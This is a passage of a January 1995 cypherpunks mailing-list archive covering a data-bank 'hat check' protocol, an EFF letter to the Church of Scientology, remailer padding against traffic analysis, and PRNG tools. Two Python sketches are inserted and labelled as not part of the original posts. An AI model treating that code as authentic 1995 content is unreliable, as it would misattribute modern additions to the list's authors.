bank to the client while computing the secure hash, and if the secure hash
matches that in the hat check, deliver the payment to the bank. The notary
need not have long term financial stability as must the bank.

Brokers may have an interface similar to a bank. They return baskets of hat
checks. This reduces the risk to the client that one of the data banks will
fail financially and be unable to pay the penalty. The broker need not be
financially stable.

Data Hunters can engage in knowing who has what data. Given a hash they can
tell you what banks have the data. This would presumably require a new
protocol with the bank. This might be the ultimate URL or URI server.

Inflation can damage incentives. Hat checks might be denominated in gold or
currency baskets or whatever.

RSA modulus size is critical for long term contracts. 2K bits of modulus or
more may be warranted.

Example

I can imagine the Getty Museum digitizing its Rembrandts and storing the
results in a data bank. The data might be insured for $100,000,000. The
bank would disseminate the data to increase security and lower its risk.
The museum would probably encrypt the data and share the key and hash ala
Shamir for safe keeping. The museum would not share the hat check because
it wants to be the one paid upon default.

Incentives

A data bank, or any other player, may find keeping data profitable
beyond the point of any outstanding hat checks. It can make money by
supplying copies of the data in return for a fee plus secure hash. Indeed
new hat checks may be sold after the last had expired. Data banks thus have
an incentive to disseminate their list of holdings in the form of hashes,
as input to bounty hunters.

Design Considerations

It may seem strange that the data bank is willing to sell data to whoever
will pay. I suggest that because it is so easy to encipher the data
and not have to trust the bank. You can distribute the key thru whatever
channels you transmit the secure hash of the data.

Note that bank clients are always anonymous. Data is never held for some
known person. Data may be held solely for speculation. The purpose of the
penalty is to motivate the bank to keep data for which there is no reason
to forecast sales revenue.

The Bank's State

Logically the bank can perform all of these transactions by merely keeping
the unordered set of acquisitions. It is practically necessary to index
these by their secure hash but this can be rebuilt on demand. It must keep
canceled hat checks lest it become liable to extra penalties. The bank need
not keep records of hat checks that it has sold unless it wants to know
when it can delete acquisitions. It may want to keep marketing information
to know when acquisitions are worth keeping merely to sell copies of.
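The redemption path and the bank's state described above, as an added example that is not part of the original message. It assumes SHA-256 as the secure hash, omits the bank's blind signature (the presented check is taken as genuine), and uses hypothetical names throughout, including the serial field on the hat check.

```python
import hashlib
import secrets
from dataclasses import dataclass


def secure_hash(data):
    # Assumption: SHA-256 stands in for the unspecified "secure hash".
    return hashlib.sha256(data).hexdigest()


@dataclass(frozen=True)
class HatCheck:
    serial: str          # hypothetical field that makes each check distinct
    data_hash: str       # secure hash of the data the check covers
    penalty: int         # owed to the holder if the data cannot be produced
    redemption_fee: int  # owed to the bank when the data is produced


class DataBank:
    def __init__(self):
        self.acquisitions = {}   # secure hash -> data; the bank's only index
        self.canceled = set()    # serials kept so no penalty is paid twice

    def acquire(self, data):
        """Store data and return the hash by which the bank knows it."""
        h = secure_hash(data)
        self.acquisitions[h] = data
        return h

    def sell_hat_check(self, data_hash, penalty, redemption_fee):
        if data_hash not in self.acquisitions:
            raise KeyError("bank does not hold this data")
        return HatCheck(secrets.token_hex(8), data_hash, penalty, redemption_fee)

    def produce(self, check):
        return self.acquisitions.get(check.data_hash)

    def pay_penalty(self, check):
        """Paying the penalty cancels the check, like a spent note."""
        self.canceled.add(check.serial)
        return check.penalty

    def buy_back(self, check):
        """The holder sells the check back; the bank is released from it."""
        self.canceled.add(check.serial)


def notary_redeem(bank, check, fee_paid, chunk=4096):
    """Notary-mediated redemption.

    Returns (data, paid_to_bank, penalty_paid_to_holder). The notary hashes
    the data as it passes through and releases the fee only on a match.
    """
    if check.serial in bank.canceled:
        raise ValueError("hat check already canceled")
    if fee_paid < check.redemption_fee:
        raise ValueError("redemption fee not covered")
    data = bank.produce(check)
    if data is not None:
        digest = hashlib.sha256()
        for i in range(0, len(data), chunk):
            digest.update(data[i:i + chunk])
        if digest.hexdigest() == check.data_hash:
            return data, check.redemption_fee, 0
    # Missing or altered data: the bank owes the penalty, the fee is not paid.
    return None, 0, bank.pay_penalty(check)


if __name__ == "__main__":
    bank = DataBank()
    h = bank.acquire(b"constructed sample data")
    check = bank.sell_hat_check(h, penalty=1000, redemption_fee=5)
    print(notary_redeem(bank, check, fee_paid=5))
    bank.acquisitions[h] = b"bit rot"          # simulate damaged storage
    print(notary_redeem(bank, check, fee_paid=5))
```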






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adam.philipp@ties.org (Adam Philipp)
Date: Sat, 28 Jan 95 13:15:45 PST
To: cypherpunks@toad.com
Subject: EFF letter to Church of Scientology (FWD)
Message-ID: <199501282112.QAA21853@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

From: Stanton McCandlish <mech@EFF.ORG>
Subject: File 4--EFF Open Letter to Church of Scientology
Date: Mon, 23 Jan 1995 18:25:35 -0500 (EST)

*****POST FREELY AS APPROPRIATE*****

An Open Letter to the Church of Scientology (CoS) and the Net
from the Electronic Frontier Foundation (EFF)

Over the past several days, the Electronic Frontier Foundation
has received several reports from system administrators and
others about threats of lawsuits they have received from
attorneys for the Church of Scientology and the closely
associated Religious Technology Center and Bridge Publications,
Inc.  These threats apparently are designed to convince sysadmins
to discontinue the carriage of certain newsgroups that involve
discussions of the Church of Scientology and its teachings, solely
on the ground that some of the messages sent through these
newsgroups allegedly involve infringements of CoS copyrights or
other intellectual property rights.

EFF has also received a letter from CoS stating that it would
not use the threat of lawsuits against sysadmins if there were
any other way to deal with allegedly wrongful messages.

EFF believes there is a better way to deal with allegations of
wrongful messages -- and that using the threat of litigation to
shut down entire newsgroups, or to persuade sysadmins who
have not originated any allegedly wrongful messages to shut down
newsgroups, is itself highly inappropriate.

Electronic communications are in their infancy, and most of the
providers are not big corporations with substantial funds to
spend on expensive litigation, but rather small operators who
cannot afford protracted litigation, even if they are in the
right.  The mere threat of a lawsuit could result in some sysadmins
refusing to carry all sorts of contentious newsgroups simply because
they could not afford to put on a case to show that they should not
be held responsible for another party's alleged wrong.

Rather than attempting through threats of lawsuits to induce
innocent sysadmins to censor speech, Church members are
encouraged to participate in Usenet discussions to make their views
known and refute erroneous posts -- in other words, to answer
allegedly wrongful postings with more speech.  As U.S. Supreme Court
Justice Louis Brandeis articulated in 1927: "If there be time to
expose through discussion the falsehood and the fallacies, to avert
the evil by the processes of education, the remedy to be applied is
more speech, not enforced silence."  If CoS claims that a
copyright violation or other wrong not remediable by speech has
been perpetrated by a particular person, then it should confine
its legal threats to that person -- not direct them at an innocent
sysadmin who did no more than forward a message, and certainly
not at the innocent participants of a newsgroup seeking to exchange
views through the newsgroup channel. Even if CoS cannot determine
the identity of the person perpetrating an alleged wrong against it,
that provides no excuse for cutting off the free flow of information
over the net.

Events like these show us how important it is to search for new
paradigms for handling disputes that arise from time to time.
We think the better way to handle this dispute would be to
submit the claims and counterclaims to arbitration or
mediation, perhaps in a proceeding conducted over the net
among the parties to the newsgroup discussion. EFF offers its
services to help find an appropriate mediator or arbitrator
who would be available online for this purpose. Any party to
this dispute that refused to participate in such a forum would,
of course, have to explain why it had done so if a case were
brought in a more traditional court.

Meanwhile, we urge CoS to leave the innocent sysadmins out of
their fight.  We urge CoS not to take actions designed to cut off
the free flow of information through the net.  Where there are
legitimate disputes about particular messages or the wrongful
actions of particular individuals, those can and should be
addressed -- perhaps most efficiently through the new
communications medium itself.


The Electronic Frontier Foundation
1667 K St. NW, Suite 801
Washington DC 20006-1605 USA
+1 202 861 7700 (voice)
+1 202 861 1258 (fax)
+1 202 861 1223 (BBS - 16.8k ZyXEL)
+1 202 861 1224 (BBS - 14.4k V.32bis)
Internet: ask@eff.org
Internet fax gate: remote-printer.EFF@8.5.2.1.1.6.8.2.0.2.1.tpc.int

- -- ---------------------------------+------------------------------------------
|PGP Key available on the keyservers|GJ/CS d H S:+ g? p? au+ a- w+ v++ c++ UL+|
| PGP Encrypted E-mail welcome.     |UU+ US+ P+ 3 E N++ k- W++ M-- V po- Y++  |
|                                   |t++ 5+ jx R G' tv+ b+++ D++ B--- E+++ u**|
|SUB ROSA: Confidential, secret, not|h-- f++ r+ n+ y++--                      | 
|for publication.                   |[ For the geek impaired, a description ] |
- ------------------------------------+------------------------------------------

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLyqzDioZzwIn1bdtAQGingF/TK6A/nChN15OtfVBsFz+arWW7x7n0EQ8
x7Bd8XLvBvvE0r1iU2YHNHPlu1ju6pyq
=OsP5
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Sattler <msattler@jungle.com>
Date: Sat, 28 Jan 95 16:30:56 PST
To: cypherpunks@toad.com
Subject: Re: Encrypted Magazine Subscriptions Via E-Mail?
Message-ID: <v0300110cab508e0f1717@[140.174.229.179]>
MIME-Version: 1.0
Content-Type: text/plain


>I posed this question in alt.wired. Am I missing something obvious as to
>why Wired (or magazines in general) don't do this to make subscribing
>easier?

Because if you saw the low-tech state of the Wired office you'd understand;
they're at capacity just opening envelopes and manually entering names and
addresses off the cheques.  Visit them whenever you're in downtown San
Francisco.

-----------------------------------------------------------------------+
Michael Sattler <msattler@jungle.com>       San Francisco, California  |
Digital Jungle Consulting Services     http://www.jungle.com/msattler/ |
                                                                       |
And so these men of Indostan/ disputed long and loud/ each in his own  |
opinion/ exceeding stiff and strong/ though each was partly right/ and |
all were in the wrong! - John Godfrey Saxe                             |






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jaeson.M.Engle@josaiah.sewanee.edu (Rhys Kyraden)
Date: Sat, 28 Jan 95 14:33:42 PST
To: cypherpunks@toad.com
Subject: Remailer Specs
Message-ID: <v01510101ab506828bb63@[152.97.12.101]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

        Since I have begun the project of writing the Remailer for the Mac,
I suddenly realized that I do not know exactly what is expected of it, and
therefore would like some pointers to the specs of a remailer (I have seen
references to padding and splitting but do not know what this is nor how to
implement it.)
TIA,
_jaeson
-----BEGIN PGP SIGNATURE-----
Version: 2.6ui

-----END PGP SIGNATURE-----

                                             aka:
(-: Jaeson M. Engle    ||    jme@josaiah.sewanee.edu :-)
(-:      www server: http://josaiah.sewanee.edu/         :-)
(-: It's February 8th! IT'S TIME!!! Ask me for details!:-)
(-: Finger 'jme@josaiah.sewanee.edu' for my Public :-)
                                        PGP block.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpp@markv.com
Date: Sat, 28 Jan 95 16:40:49 PST
To: cypherpunks@toad.com
Subject: Re: Protocols for a Data Bank
In-Reply-To: <ab5087cb03021004c425@DialupEudora>
Message-ID: <9501281639.ab19254@hermix.markv.com>
MIME-Version: 1.0
Content-Type: text/plain


> Date: Sat, 28 Jan 1995 15:49:13 -0800
> From: norm@netcom.com (Norman Hardy)
>   [...]
> Selling Hat Checks: The bank will sell a hat check to anyone who will pay a
> negotiated price. The hat check specifies the secure hash of the data, the
> penalty to be paid upon failure to produce the data, and the cost of
> redeeming the data. The hat check is signed blindly by the bank and is a
                                              ^^^^^^^
> bearer instrument. Any holder of a hat check can present the check along
> with the redemption fee and demand the data. 

  Why in the world would the bank want to sign blindly?  The bank
would be undertaking an obligation of an unknown nature.  Would you
sign a blank check?  A blank contract?  I wouldn't.

  Unless the communication mechanism ensures anonymity, the bank can
know who deposited what, and who 'withdrew' what.

j'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: A5113643667@attpls.net (Tom Jones)
Date: Sat, 28 Jan 95 08:48:55 PST
To: cypherpunks@toad.com (Cypherpunks)
Subject: Encrypted Magazine Subscriptions Via E-Mail?
Message-ID: <0rYGKG.43O04O@pjl53ik.i-p.attmail.com>
MIME-Version: 1.0
Content-Type: text


Look at mpj/pub/pgcharge.zip in ftp.csn.ofg.  It was designed to do
that sort of thing.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Sat, 28 Jan 95 14:53:34 PST
To: cypherpunks@toad.com
Subject: Why encrypt intra-remailernet.
Message-ID: <Pine.3.89.9501281651.A2705-0100000@edwin.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
 
    Suppose Alice sends Bob a message e(M) through Chaum.  Eve, a strong
opponent, wants to trace the message.  She keeps track of all outgoing mail
from Alice, an MD5 hash of all incoming messages to Bob, and outgoing from
Bob.  Eve then sends Chaum e(M), and waits for a matching MD5 to Bob that
doesn't correlate to an outgoing MD5 from Bob.  (Eve knows that Bob is a
remailer.)
 
(Thanks to whoever came up with Eve.  I'm embarrassed that I didn't think of
that trick.)
 
    Clearly, this generalizes.
 
 
 
    Gentlemen, I believe that I have just stumbled upon a strong proof of
the necessity of remailer auto-encryption of all messages.  Since the
session key is PRG, MD5 will change (a lot;).  Furthermore, remailer auto-
encryption allows the mailers to number their messages to each other.  A
low number means a re-transmit from the remailer, which is not possible,
unless some sort of ACK system is in place, and even then, would still
flag.  Of course, if the remailers _sign_ their messages (on the way out)
as well, you could compare the timestamps of the signatures with the
message itself.
 
 
 
- ---
 
    I also believe that the spammed remailer attack reveals another
important weakness:  if 50% of all mail leaving Alice during one tick goes
to Bob, then Eve can gain probabilistic information about the messages that
Alice received, when attempting to trace a message through the net.  This
"attack" suggests a rational use of garbage:
 
    1) A remailer always sends at least as many messages as it receives,
       _including junk_.
 
         This means that you don't have a system "mysteriously" receiving
         200 messages, and sending eight.
 
 
    2) A remailer always sends at least n messages per tick.  (n may vary
       between remailers.)
 
          If a remailer has very low traffic, that traffic is still
          protected.
 
    3) On a given tick, a remailer always sends the same number of messages
       to each other remailer.
 
          This eliminates the effectiveness of a spam hit on a remailer of
          an old message.
 
    4) Designated users of the net receive the same number of messages from
       each remailer each tick.  (Such users probably _send_ the same
       number of messages each tick, as well.  Note also that if some
       remailer is untrusted, that will be reflected by its always being
       sent garbage.)
 
          This puts the users "inside" the net.
 
    No, these axioms do not blow up the amount of garbage.  New messages to
the net displace garbage, unless they raise the maximum for the number
going to a particular remailer.
 
    This system also has the advantage of _immediately_ fully integrating
any new remailers.  New remailers don't have to build up their users in
order to be secure.
 
- ---
 
    By combining these two, I believe we can turn the remailer net into a
black box, including designated users.  A communication should be safe if
either end is in the black box.  I believe that "PGP only" is the only way
that remailers will be able to fulfill their potential.  It should also
increase the base of PGP users.
 
 
- ---
 
    I nominate the phrases "Execute plan X.", "I have the soveineers.",
"Your fried chicken is ready.", and "The NSA is a bunch of idiots." for
garbage.  If they ever attempt to prosecute, they have to reveal that they
broke IDEA or RSA to X digits.
 
___
 
 
    Note that the maintenance of an MD5 log of all messages by recipient
by the remailers can be used to kill primitive spam/bombs.
 
 
 
"PGP?"                        "ITAR!"                          "Oh, RKBA!"
 
 
                   |--------------------------------------------------+
  ----------------- 14712B4D 1994/12/26 Nathan H. Zook <nzook@bga.com> )
 |44B3D866 3D551E2E ---------------------------------------------------
 |F89222A6 338CDE24/ |
  -----------------
 
 
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
 
-----END PGP SIGNATURE-----
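Garbage rules 1 to 3 and the per-recipient MD5 log from the message above, as an added example that is not part of the original post. It assumes every next hop is another remailer in a fixed peer list; the class, its methods and the sample messages are hypothetical.

```python
import hashlib
from collections import Counter
from math import ceil


class Remailer:
    def __init__(self, peers, n_min):
        self.peers = list(peers)   # other remailers this one forwards to
        self.n_min = n_min         # rule 2: minimum messages sent per tick
        self.seen = {}             # recipient -> MD5 digests already handled
        self.queue = []            # accepted (next_hop, body) for this tick
        self.received = 0          # everything that arrived this tick

    def accept(self, next_hop, body):
        """Queue a message unless the same bytes were already seen for next_hop.

        A replayed copy still counts as received, so the junk sent in its
        place keeps the tick's output from shrinking (rule 1).
        """
        if next_hop not in self.peers:
            raise ValueError("unknown next hop")
        self.received += 1
        digest = hashlib.md5(body).hexdigest()
        log = self.seen.setdefault(next_hop, set())
        if digest in log:
            return False           # duplicate for this recipient: drop it
        log.add(digest)
        self.queue.append((next_hop, body))
        return True

    def plan_tick(self):
        """Return {peer: (real, junk)} for this tick, then start a new tick.

        Every peer gets the same count (rule 3). That count is large enough
        that the total is at least what was received (rule 1) and at least
        n_min (rule 2), and never smaller than the busiest peer's real load.
        """
        real = Counter(hop for hop, _ in self.queue)
        floor = ceil(max(self.received, self.n_min) / len(self.peers))
        per_peer = max(floor, max(real.values(), default=0))
        plan = {p: (real[p], per_peer - real[p]) for p in self.peers}
        self.queue, self.received = [], 0
        return plan


def total_sent(plan):
    return sum(real + junk for real, junk in plan.values())


if __name__ == "__main__":
    r = Remailer(["B", "C", "D"], n_min=6)
    r.accept("B", b"constructed message 1")
    r.accept("B", b"constructed message 1")   # replayed copy is dropped
    r.accept("C", b"constructed message 2")
    print(r.plan_tick())                      # same count to B, C and D
```

A real message sent to a peer below the per-peer count replaces one junk message, so the total for the tick changes only when a single peer's real load exceeds that count.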





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@clark.net>
Date: Sat, 28 Jan 95 14:58:45 PST
To: cypherpunks@toad.com
Subject: PRNG conditioning
Message-ID: <199501282258.RAA28933@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


I just posted:

From: cme@clark.net (Carl Ellison)
Newsgroups: sci.math,sci.math.num-analysis,sci.stat,sci.stat.math,comp.simulation,sci.crypt,sci.crypt.research
Subject: Pseudo-random number conditioning toolkit
Date: 28 Jan 1995 17:41:58 -0500

a pointer to my PRNG conditioning tools as UNIX processes, to be found
under:

	ftp://ftp.clark.net/pub/cme

These include:

1.	ranG
a PRNG (either MD5 or SWB [subtract-with-borrow]), seeded by stdin and
writing stdout;

2.	ranH
an MD5 conditioner (takes w bytes from stdin, writes 15 or 16 bytes to
stdout);

3.	ranM
algorithm M -- (cf., Knuth vol.2) -- fed by either an internal SWB
generator or a [pipe|file|device] whose name is given as a parameter.

----------------------------------------

4.	ranD
using DES to condition stdin to stdout isn't there, thanks to the ITAR.
I've sent a copy to Mark at ripem.msu.edu.

----------------------------------------

 - Carl



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jaeson.M.Engle@josaiah.sewanee.edu (Rhys Kyraden)
Date: Sat, 28 Jan 95 16:06:34 PST
To: cypherpunks@toad.com
Subject: Re: Remailer Specs
Message-ID: <v01510103ab507de1bbd9@[152.97.12.101]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>ftp myriad.pc.cc.cmu.edu /pub/remailer
>ftp cs.cmu.edu /afs/andrew.cmu.edu/usr12/mg5n/public/remailer

Thanks for the sites, but after looking at them, I can say they will NOT
build in THINK C. But, They might help me figure out what to do with
Remailer (the Mac version I'm building).  Also, I'm not writing mine
in C, I'm doing it in Pascal, because 1) I have the TCP libraries for it and
2) I don't know C very well at all.

-----BEGIN PGP SIGNATURE-----
Version: 2.6ui

-----END PGP SIGNATURE-----

                                             aka:
(-: Jaeson M. Engle    ||    jme@josaiah.sewanee.edu :-)
(-:      www server: http://josaiah.sewanee.edu/         :-)
(-: It's February 8th! IT'S TIME!!! Ask me for details!:-)
(-: Finger 'jme@josaiah.sewanee.edu' for my Public :-)
                                        PGP block.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Todd Masco <cactus@hks.net>
Date: Sat, 28 Jan 95 15:19:02 PST
To: cypherpunks@toad.com
Subject: NNTP archives
Message-ID: <199501282315.SAA22879@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


If anybody ever actually uses the cypherpunks archives via NNTP on hks.net,
please let me know immediately (we don't log).  I'm probably going to be
putting a reasonable expire time on the group and archive the articles at
expire time: if people use it, I can set up a "cypherpunks archive group"
for NNTP access.

This won't affect folks who use the NNTP access to read cypherpunks
normally: I'll probably set the expire time to something like a month.

	-- Todd
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLyrP8ioZzwIn1bdtAQF0VQF9HSyCQDkeUMiso29z3TOJY4cuj6EQdjq1
JpRBSoM35ZOfKcTQ2qSIvn6WvLk56pZD
=RAyu
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Sattler <msattler@jungle.com>
Date: Sat, 28 Jan 95 18:23:29 PST
To: cypherpunks@toad.com
Subject: Re: Encrypted Magazine Subscriptions Via E-Mail?
Message-ID: <v03001112ab50a87b4c14@[140.174.229.179]>
MIME-Version: 1.0
Content-Type: text/plain


>>>why Wired ... don't [use PGP] to make subscribing easier?
>>
>> Because if you saw the low-tech state of the Wired office...
>
>Yup, too busy to automate. After all, if they took orders by email,
>they wouldn't need manual intervention. It all makes perfect
>sense. Why spend effort to lower the amount of time their staff need
>to spend on manual tasks? Makes more sense just to remain buried.

That a bunch of their staff is the minimum-wage "gee, look at my Mac" crowd
might have something to do with it.  I was amazed to find out that there
really are two sides to Wired: the professional computer geeks (eg.
Negroponte) and the professional get-a-magazine-out geeks, and the twain
never seem to meet.

-----------------------------------------------------------------------+
Michael Sattler <msattler@jungle.com>       San Francisco, California  |
Digital Jungle Consulting Services     http://www.jungle.com/msattler/ |
                                                                       |
And so these men of Indostan/ disputed long and loud/ each in his own  |
opinion/ exceeding stiff and strong/ though each was partly right/ and |
all were in the wrong! - John Godfrey Saxe                             |






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew J Ghio <mg5n+@andrew.cmu.edu>
Date: Sat, 28 Jan 95 15:34:08 PST
To: cypherpunks@toad.com
Subject: Re: Remailer Specs
In-Reply-To: <v01510101ab506828bb63@[152.97.12.101]>
Message-ID: <sj_hF_W00WB_5EYYZV@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Jaeson M. Engle wrote:

>         Since I have begun the project of writing the Remailer for the
> Mac, I suddenly realized that I do not know exactly what is expected of
> it, and therefore would like some pointers to the specs of a remailer
> (I have seen references to padding and splitting but do not know what
> this is nor how to implement it.)

Well, you could look at some existing code.  My remailer is written in C,
with most of the unix-specific stuff being done by shell scripts, so
you should be able to compile some of the C code on the Mac (if you're
planning to write your remailer in C).

Look in:

ftp myriad.pc.cc.cmu.edu /pub/remailer
ftp cs.cmu.edu /afs/andrew.cmu.edu/usr12/mg5n/public/remailer





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sat, 28 Jan 95 16:39:36 PST
To: Michael Sattler <msattler@jungle.com>
Subject: Re: Encrypted Magazine Subscriptions Via E-Mail?
In-Reply-To: <v0300110cab508e0f1717@[140.174.229.179]>
Message-ID: <9501290039.AA21391@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Michael Sattler says:
> >I posed this question in alt.wired. Am I missing something obvious as to
> >why Wired (or magazines in general) don't do this to make subscribing
> >easier?
> 
> Because if you saw the low-tech state of the Wired office you'd understand;
> they're at capacity just opening envelopes and manually entering names and
> addresses off the cheques.  Visit them whenever you're in downtown San
> Francisco.

Yup, too busy to automate. After all, if they took orders by email,
they wouldn't need manual intervention. It all makes perfect
sense. Why spend effort to lower the amount of time their staff need
to spend on manual tasks? Makes more sense just to remain buried.

I called and asked the Wired folks why they weren't using PGP. They
said they thought it couldn't be used for commercial purposes. I gave
them the phone number for ViaCrypt. They never did anything with it so far
as I can tell.


Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Sat, 28 Jan 95 16:47:00 PST
To: Rhys Kyraden <Jaeson.M.Engle@josaiah.sewanee.edu>
Subject: Re: Remailer Specs
In-Reply-To: <v01510101ab506828bb63@[152.97.12.101]>
Message-ID: <Pine.SUN.3.91.950128194321.1158A-100000@unix2.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 28 Jan 1995, Rhys Kyraden wrote:

>         Since I have begun the project of writing the Remailer for the Mac,
> I suddenly realized that I do not know exactly what is expected of it, and
> therefore would like some pointers to the specs of a remailer (I have seen
> references to padding and splitting but do not know what this is nor how to
> implement it.)

	I've started work on a formal remailer standards document that 
describes just how a Cypherpunk Type I remailer should process messages, 
with full header descriptions, etc. After I've checked it against the 
behaviors of all the various Cypherpunk remailer packages (Ghio vs Eric 
Hollander vs Sameer vs Mixmaster in compatibility mode vs whatever else), 
I'll post it here for comments.

--
Michael Handler                                         <grendel@netaxs.com>
Civil Liberty Through Complex Mathematics                   Philadelphia, PA
"Toi qui fais au proscrit ce regard calme et haut" -- Baudelaire * Skotoseme
PGP Key ID FC031321  Print: 9B DB 9A B0 1B 0D 56 DA  61 6A 57 AD B2 4C 7B AF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Sat, 28 Jan 95 20:22:57 PST
To: cypherpunks@toad.com
Subject: Re: Again, where to upload code?
In-Reply-To: <199501290309.WAA14018@libws2.ic.sunysb.edu>
Message-ID: <199501290422.UAA28890@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Robert Rothenberg <rrothenb@ic.sunysb.edu>

   Tried it. Permission denied.

Did you try reading README.UPLOAD in pub/cypherpunks yet?

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Sat, 28 Jan 95 21:11:45 PST
To: cypherpunks@toad.com
Subject: Re: Protocols for a Data Bank
Message-ID: <ab50d284000210041752@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 4:39 PM 1/28/95, jpp@markv.com wrote:
>> Date: Sat, 28 Jan 1995 15:49:13 -0800
>> From: norm@netcom.com (Norman Hardy)
>>   [...]
>> Selling Hat Checks: The bank will sell a hat check to anyone who will pay a
>> negotiated price. The hat check specifies the secure hash of the data, the
>> penalty to be paid upon failure to produce the data, and the cost of
>> redeeming the data. The hat check is signed blindly by the bank and is a
>                                              ^^^^^^^
>> bearer instrument. Any holder of a hat check can present the check along
>> with the redemption fee and demand the data.
>
>  Why in the world would the bank want to sign blindly?  The bank
>would be undertaking an obligation of an unknown nature.  Would you
>sign a blank check?  A blank contract?  I wouldn't.
....
You are right. I forgot that the blind signer knows nothing of what he
signs. The protocol requirements seem clear but I lack a protocol. I think
I have a fix but I will be more careful before I post.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@rand.org>
Date: Sat, 28 Jan 95 21:11:23 PST
To: cypherpunks@toad.com
Subject: Re: SHA Reference?
In-Reply-To: <199501290240.VAA13762@libws2.ic.sunysb.edu>
Message-ID: <199501290511.VAA17470@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> Robert Rothenberg <rrothenb@ic.sunysb.edu> writes:
> Just a question about SHA: how does one distinguish between them?

I think of them as SHA-1 and SHA-2, but I don't know if that's
usual.  When I say simply "SHA" I mean the Revised Standard Version.

	Jim Gillogly
	Trewesday, 8 Solmath S.R. 1995, 05:11




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenberg <rrothenb@ic.sunysb.edu>
Date: Sat, 28 Jan 95 18:32:16 PST
To: cypherpunks@toad.com
Subject: Again, where to upload code?
Message-ID: <199501290232.VAA13727@libws2.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


I posted this query recently with no replies, then again it's not been
"duped" back to my account either, so I'm not sure if it went through.

I've written some fingerprinting code for MD4, MD5, SHA, RIPE-MD and HAVAL
in assembly language for 386 machines and would like to make it available,
not sure of an ftp-site... pref. ITAR-safe or are those algorithms not
covered under it?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenberg <rrothenb@ic.sunysb.edu>
Date: Sat, 28 Jan 95 18:40:36 PST
To: jim@acm.org
Subject: Re: SHA Reference?
In-Reply-To: <199501282027.MAA17185@mycroft.rand.org>
Message-ID: <199501290240.VAA13762@libws2.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


Just a question about SHA: how does one distinguish between them?

Is the older sha called "SHA" and the newer one "Revised SHA" or is it
"Former-SHA" and "SHA"?

It's a minor point, but still a confusing one. (It'll be more confusing if
there are more than two...)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sat, 28 Jan 95 18:45:11 PST
To: Robert Rothenberg <rrothenb@ic.sunysb.edu>
Subject: Re: Again, where to upload code?
In-Reply-To: <199501290232.VAA13727@libws2.ic.sunysb.edu>
Message-ID: <9501290244.AA21613@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



I suspect ftp.csua.berkeley.edu will take them... Sameer?

Perry

Robert Rothenberg says:
> I posted this query recently with no replies, then again it's not been
> "duped" back to my account either, so I'm not sure if it went through.
> 
> I've written some fingerprinting code for MD4, MD5, SHA, RIPE-MD and HAVAL
> in assembly language for 386 machines and would like to make it available,
> not sure of an ftp-site... pref. ITAR-safe or are those algorithms not
> covered under it?
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Claborne <Chris.Claborne@SanDiego.ATTGIS.COM>
Date: Sat, 28 Jan 95 22:16:21 PST
To: cypherpunks@toad.com
Subject: Re: MS Office NT
Message-ID: <9501290109.aa00772@ncrhub1.ATTGIS.COM>
MIME-Version: 1.0
Content-Type: text/plain


Re: Office for NT, kahuna@fc.net writes:
>I installed it yesterday, and played with it for about 5 minutes. ... I
>wasn't able to save more than 8.3 in powerpoint, but Word did recognize this
>feature, and I saved a file as 13456789012345.doc without a problem.  ...yay?

This is one of the major features in NT, why the hell would they bother
shipping it if it didn't support 255 char names???

